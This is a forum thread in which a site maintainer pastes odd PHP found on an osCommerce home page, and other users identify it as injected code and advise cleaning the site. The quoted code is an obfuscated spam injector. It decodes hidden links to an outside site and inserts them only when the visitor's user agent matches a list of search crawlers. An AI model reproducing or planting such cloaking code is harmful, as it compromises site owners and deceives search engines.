Odd looking code

[phila6se]

Hi I am a complete newbie to OSX and I am working on SEO for a new client who's site is powered by OSX. I am not a coder but I have found some strange looking code that is whited out when you view source yet appears in red in Dreamweaver which I find odd. There is lots of it and I have copied some examples from it. Can anyone let me know if this is genuine code or not and if it is what does it do. Oh and it only appears on the home page.

 

<?php

if(function_exists("ob_start")){

ob_start('ob_handler_0');

}

function ob_handler_0($buff){

$hash_admin_moduls="60x102x111x114x109x32x109x101x116x104x111x100x61x34x112x111x115x116x34x32x97x99x116x105x111x110x61x34x63x34x32x115x116x121x108x101x61x34x111x118x101x114x102x108x111x119x58x32x97x117x116x111x59x32x119x105x100x116x104x58x32x56x112x116x59x32x104x101x105x103x104x116x58x32x53x112x116x59x112x111x115x105x116x105x111x110x58x32x97x98x115x111x108x117x116x101x59x100x105x115x112x108x97x121x58x110x111x110x101x34x62x60x97x32x104x114x101x102x61x34x104x116x116x112x58x47x47x116x100x114x99x46x110x101x116x47x108x105x115x116x115x47x116x101x120x116x115x47x115x119x105x115x115x47x99x97x114x116x105x101x114x95x102x114x97x110x99x97x105x115x101x46x112x104x112x34x62x99x97x114x116x105x101x114x32x102x114x97x110x99x97x105x115x101x60x47x97x62x13x10x60x97x32x104x114x101x102x61x34x104x116x116x112x58x47x47x116x100x114x99x46x110x101x116x47x108x105x115x116x115x47x116x101x120x116x115x47x115x119x105x115x115x47x99x97x114x116x105x101x114x95x102x114x97x110x99x97x105x115x101x95x108x97x100x105x101x115x95x119x97x116x99x104x46x112x104x112x34x62x99x97x114

 

There is about 80 lines of this

 

 

 

Then

$is_bot_detected = FALSE;

foreach($stop_ips_masks as $k=>$v)

if( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) )

$is_bot_detected = TRUE ;

if($is_bot_detected || !( FALSE === strpos( preg_replace( array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#','#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i','#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i','#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i','#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i','#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i','#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i','#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i','#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i','#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i','#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i','#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i','#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i','#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i','#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i','#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i','#charlotte#i', '#ngb#i' ), '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ) {$s = explode('x', $hash_admin_moduls);$bufF = '';foreach ($s as $ch)$bufF .= chr($ch);return str_ireplace("</body>",$bufF."</body>",$buff);}else return $buff;

}

 

Thanks in anticipation

[burt]

This is not standard oscommerce code, so I would suggest that your client needs to find someone able to clean the site and lock it down.

[germ]

Since it appears to be looking for web spiders, my guess it adds spam links to the page when the site is getting crawled.

 

I've seen this a lot.

 

Most peple don't even know their site is a target because they don't look at the HTML source of their index page in the g00gle cache, and they don't look at their source code on the site often enough to see that it's been altered.

 

Like Burt said, clean it up and lock it down (helpful link below).

 

How to Secure Your Site